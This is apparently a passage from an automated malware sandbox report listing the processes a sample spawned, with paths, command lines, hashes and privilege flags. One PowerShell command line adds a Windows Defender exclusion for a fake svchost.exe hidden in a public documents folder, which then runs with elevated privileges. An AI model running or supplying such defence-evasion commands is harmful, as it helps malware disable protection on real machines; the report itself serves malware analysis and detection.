Start date: 09/03/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase: 0x7ff7488e0000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 22:19:40
Start date: 09/03/2021
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' -Force
Imagebase: 0xfc0000
File size: 430592 bytes
MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET

General

Start time: 22:19:41
Start date: 09/03/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6b2800000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 22:19:41
Start date: 09/03/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: 'C:\Windows\System32\cmd.exe' /c timeout 1
Imagebase: 0x40000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 22:19:41
Start date: 09/03/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6b2800000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 22:19:41
Start date: 09/03/2021
Path: C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit): true
Commandline: timeout 1
Imagebase: 0xc80000
File size: 26112 bytes
MD5 hash: 121A4EDAE60A7AF6F5DFA82F7BB95659
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 22:19:44
Start date: 09/03/2021
Path: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe
Imagebase: 0x370000
File size: 45816 bytes
MD5 hash: A489513CA0DE2472E0AD79830DD9AC44
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Disassembly

Code Analysis